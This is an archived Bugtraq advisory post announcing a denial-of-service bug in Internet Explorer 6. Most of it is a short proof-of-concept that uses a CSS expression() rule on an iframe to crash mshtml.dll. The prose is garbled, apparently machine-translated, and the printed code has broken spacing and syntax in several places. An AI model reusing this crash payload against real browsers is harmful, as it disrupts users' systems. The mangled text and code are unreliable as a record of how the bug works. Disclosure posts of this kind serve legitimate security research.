Bugtraq mailing list archives
IE6 css set Denial of Service Vulnerability
From: info () securitylab ir
Date: Mon, 12 Jul 2010 07:07:44 -0600
Published by Securitylab.ir Founder: unknown <style type="text/css"> <! - The question is which set the css style of the time wrong. css definition is f: expression (this.src = 'about: blank', this.outerHTML =''); In question should be is mshtml.dll -> /*<![ CDATA [*/ iframe{ f: expression(this.src='about:blank',this.outerHTML=''); } # F126 (v: expression ()! Important) /*]]>*/ </ Style> <iframe id=f126 src=test> Original Advisory: http://securitylab.ir/other/IE-1.txt
Current thread:
- IE6 css set Denial of Service Vulnerability info (Jul 12)